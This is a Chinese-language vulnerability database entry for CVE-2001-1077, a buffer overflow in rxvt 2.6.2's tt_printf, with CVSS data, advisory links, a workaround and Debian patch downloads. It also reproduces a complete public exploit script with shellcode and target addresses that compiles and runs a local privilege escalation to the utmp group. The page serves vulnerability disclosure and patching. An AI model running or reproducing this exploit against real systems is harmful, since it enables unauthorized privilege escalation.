CVE-2001-1077
CVSS4.6
发布时间 :2001-06-15 00:00:00
修订时间 :2008-09-10 15:09:37
NMCOES    

[原文]Buffer overflow in tt_printf function of rxvt 2.6.2 allows local users to gain privileges via a long (1) -T or (2) -name argument.


[CNNVD]Rxvt 本地缓冲区溢出漏洞(CNNVD-200106-065)

        CVE(CAN) ID: CAN-2001-1077
        
        
        
        Rxvt 是一个彩色VT102中断仿真程序,可以作为xterm的替代软件。
        
        
        
        rxvt存在一个缓冲区溢出漏洞。如果给它的某些命令行选项("-T"或者"-name")提供超长
        
        的参数,就会触发缓冲区溢出。rxvt在某些系统下被设置了setgid utmp属性,本地攻击
        
        者可能利用这个漏洞来获取utmp组权限。
        
        
        
        有问题的代码在tt_printf()函数:
        
        
        
        void
        
        tt_printf(const char *fmt,...)
        
        {
        
         int i;
        
         va_list arg_ptr;
        
         unsigned char buf[256];
        
        
        
         va_start(arg_ptr, fmt);
        
         vsprintf(buf, fmt, arg_ptr);
        
         va_end(arg_ptr);
        
         tt_write(buf, strlen(buf));
        
        }
        
        
        
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1077
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1077
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-065
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6701.php
(VENDOR_ADVISORY)  XF  rxvt-ttprintf-bo(6701)
http://www.securityfocus.com/archive/1/191510
(VENDOR_ADVISORY)  BUGTRAQ  20010615 Rxvt vulnerability
http://www.debian.org/security/2001/dsa-062
(VENDOR_ADVISORY)  DEBIAN  DSA-062
http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-028-01
(VENDOR_ADVISORY)  IMMUNIX  IMNX-2001-70-028-01
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-060.php
(UNKNOWN)  MANDRAKE  MDKSA-2001:060
http://www.securityfocus.com/bid/2878
(UNKNOWN)  BID  2878

- 漏洞信息

Rxvt 本地缓冲区溢出漏洞
中危 边界条件错误
2001-06-15 00:00:00 2005-10-20 00:00:00
本地  
        CVE(CAN) ID: CAN-2001-1077
        
        
        
        Rxvt 是一个彩色VT102中断仿真程序,可以作为xterm的替代软件。
        
        
        
        rxvt存在一个缓冲区溢出漏洞。如果给它的某些命令行选项("-T"或者"-name")提供超长
        
        的参数,就会触发缓冲区溢出。rxvt在某些系统下被设置了setgid utmp属性,本地攻击
        
        者可能利用这个漏洞来获取utmp组权限。
        
        
        
        有问题的代码在tt_printf()函数:
        
        
        
        void
        
        tt_printf(const char *fmt,...)
        
        {
        
         int i;
        
         va_list arg_ptr;
        
         unsigned char buf[256];
        
        
        
         va_start(arg_ptr, fmt);
        
         vsprintf(buf, fmt, arg_ptr);
        
         va_end(arg_ptr);
        
         tt_write(buf, strlen(buf));
        
        }
        
        
        
        

- 公告与补丁

        
        
        临时解决方法:
        
        
        
        我们建议您暂时去掉rxvt的setuid/setgid属性:
        
        # chmod a-s rxvt
        
        
        
        厂商补丁:
        
        
        
        Debian Linux (
        http://www.debian.org/security/
)为此发布了一份安全公告 :
        
        DSA-062-1 rxvt: buffer overflow
        
        
        http://www.debian.org/security/2001/dsa-062

        
        
        
        补丁下载 -
        
        ________________________________________________________________________
        
        Debian GNU/Linux 2.2 (potato)
        
        
        
        Source:
        
        
        http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.diff.gz

        
        
        http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.dsc

        
        
        http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2.orig.tar.gz

        
        
        
        Alpha:
        
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt-ml_2.6.2-2.1_alpha.deb

        
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt_2.6.2-2.1_alpha.deb

        
        
        
        ARM:
        
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt-ml_2.6.2-2.1_arm.deb

        
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt_2.6.2-2.1_arm.deb

        
        
        
        Intel IA-32:
        
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt-ml_2.6.2-2.1_i386.deb

        
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt_2.6.2-2.1_i386.deb

        
        
        
        Motorola 680x0:
        
        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt-ml_2.6.2-2.1_m68k.deb

        
        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt_2.6.2-2.1_m68k.deb

        
        
        
        PowerPC:
        
        
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt-ml_2.6.2-2.1_powerpc.deb

        
        
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt_2.6.2-2.1_powerpc.deb

        
        
        
        Sun Sparc:
        
        
        http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt-ml_2.6.2-2.1_sparc.deb

        
        
        http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt_2.6.2-2.1_sparc.deb

        
        
        
        ________________________________________________________________________
        

- 漏洞信息 (20928)

Rxvt 2.6.1/2.6.2 Buffer Overflow Vulnerability (EDBID:20928)
linux local
2001-06-15 Verified
0 MasterSecuritY
N/A [点击下载]
source: http://www.securityfocus.com/bid/2878/info

Rxvt is a color VT102 terminal emulator for X intended as an xterm(1) replacement.

A buffer overflow vulnerability exists in rxvt.

The error occurs when certain command line options with long arguments are passed to rxvt.

Because rxvt is installed setgid 'utmp' by some system configurations, it may be possible for local users to execute arbitrary code/commands with these privileges.

#!/bin/sh

#
# MasterSecuritY <www.mastersecurity.fr>
#
# xrxvt.sh - Local exploit for xrxvt 2.6.2
# Copyright (C) 2001  Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
# Copyright (C) 2001  Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

echo "rxvt-2.6.2 exploit for Linux Debian 2.2"
echo "Which target :"
echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2"
echo -e "\t1. rxvt 2.6.2 (tarball) on Debian 2.2"
echo
echo -n "target : "

read TARGET

cat > /tmp/xx.c <<EOF
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main()
{
        char * p_ttyname;
        char * argv[] = { "/bin/sh", NULL };

        p_ttyname = ttyname( STDERR_FILENO );
        if ( p_ttyname == NULL ) {
                return( -1 );
        }
        if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) {
                return( -1 );
        }
        if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) {
                return( -1 );
        }

        execve( argv[0], argv, NULL );
        return( -1 );
}
EOF
gcc -o /tmp/xx /tmp/xx.c
rm -f /tmp/xx.c

cat > /tmp/xrxvt.c << EOF
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <X11/X.h>
#include <X11/Xlib.h>

#define BUF 256 /* buffer size */
#define EBP 4
#define EIP 4
#define ESC 3   /* alignment */

#define GID "\x2b"
#define DISPLAY ":0"
#define STACK ( 0xc0000000 - 4 )

Display *d;

char shellcode[] =
/* setregid( -1, GID ); */
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* setregid( GID, GID ); */
"\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* Aleph One ;) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/xx";

struct os
{
    int id;
    char *desc;
    char *path;
    unsigned long plt;
    unsigned long got;
};

struct os target[]=
{
    { 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm",
      0x0804add0, 0x0805c964 },
    { 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt",
      0x0804a690, 0x08059e1c },
    { 2, NULL, 0, 0 }
};

void usage ( char *cmd )
{
    int i;
    fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n");
    fprintf(stderr, "usage: %s <target>\n",cmd);
    fprintf(stderr, "with target:\n\n");
    for( i < 0; i < sizeof(target) / sizeof(struct os); i++ )
        fprintf(stderr, "%d. %s\n", i, target[i].desc);

    exit( -1 );
}

int main(int argc, char *argv[])
{
    char buffer[ BUF - ESC + EBP + EIP + 12 + 1];
    char * exec_argv[] = { NULL, "-T", buffer, NULL };
    char * envp[] = { shellcode, NULL };
    int i, t;
    char *path;

    if ( argc != 2 )
        usage(argv[0]);

    t = atoi(argv[1]);
    if( t < 0 || t >= sizeof(target) / sizeof(struct os) )
        usage( argv[0] );

    path = (char *)malloc(strlen(target[t].path)+1);
    strcpy(path,target[t].path);

    if ( (d = XOpenDisplay(DISPLAY)) == NULL ){
        fprintf(stderr, "Unable to open display: %s\n", DISPLAY);
        exit(10);
    }

    for ( i = 0; i < BUF - ESC + EBP; i++ ) {
        buffer[ i ] = 'A';
    }

    *( (size_t *) &(buffer[i]) ) = target[t].plt;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode);
    i += sizeof(size_t);

    buffer[i] = '\0';

    exec_argv[0] = path;
    execve( exec_argv[0], exec_argv, envp );
    return( -1 );
}
EOF
gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11
rm -f /tmp/xrxvt.c

echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..."
echo "And see ..."
/tmp/xrxvt $TARGET		

- 漏洞信息

14142
rxvt tt_printf Function Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-06-15 Unknow
2001-06-15 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Rxvt Buffer Overflow Vulnerability
Boundary Condition Error 2878
No Yes
2001-06-15 12:00:00 2009-07-11 06:56:00
Reported to Bugtraq by Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr> on June 15, 2001.

- 受影响的程序版本

rxvt rxvt 2.6.2
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
rxvt rxvt 2.6.1
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
- Immunix Immunix OS 6.2
Mandriva Linux Mandrake 8.0
Mandriva Linux Mandrake 7.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0

- 不受影响的程序版本

Mandriva Linux Mandrake 8.0
Mandriva Linux Mandrake 7.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0

- 漏洞讨论

Rxvt is a color VT102 terminal emulator for X intended as an xterm(1) replacement.

A buffer overflow vulnerability exists in rxvt.

The error occurs when certain command line options with long arguments are passed to rxvt.

Because rxvt is installed setgid 'utmp' by some system configurations, it may be possible for local users to execute arbitrary code/commands with these privileges.

- 漏洞利用

Samuel "Zorgon" Dralet &lt;samuel.dralet@mastersecurity.fr&gt; has made an exploit available:

- 解决方案

Vendor updates that rectify this issue are available:


rxvt rxvt 2.6.1

rxvt rxvt 2.6.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站